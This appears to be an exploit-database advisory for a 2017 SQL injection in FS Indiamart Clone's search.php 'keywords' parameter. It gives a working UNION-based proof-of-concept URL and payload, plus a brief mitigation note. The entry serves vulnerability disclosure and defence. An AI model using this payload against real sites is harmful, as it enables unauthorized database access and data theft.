vendor:
FS Indiamart Clone
by:
8bitsec
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: FS Indiamart Clone
Affected Version From: 23 October 17
Affected Version To: 23 October 17
Patch Exists: Unknown
Related CWE: Unknown
CPE: a:fortunescripts:fs_indiamart_clone
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
FS Indiamart Clone – SQL Injection
SQL injection on [keywords] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/search.php?keywords=product') UNION ALL SELECT NULL,CONCAT(0x716b787071,0x506961776c6f79515068694b454e736668707675627448527949566e434472706a72624a466a5468,0x7171627171)-- LEhA&rctyp=Products Parameter: keywords (GET) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: keywords=product') UNION ALL SELECT NULL,CONCAT(0x716b787071,0x506961776c6f79515068694b454e736668707675627448527949566e434472706a72624a466a5468,0x7171627171)-- LEhA&rctyp=Products
Mitigation:
Input validation and sanitization, use of prepared statements, and other techniques to prevent SQL injection.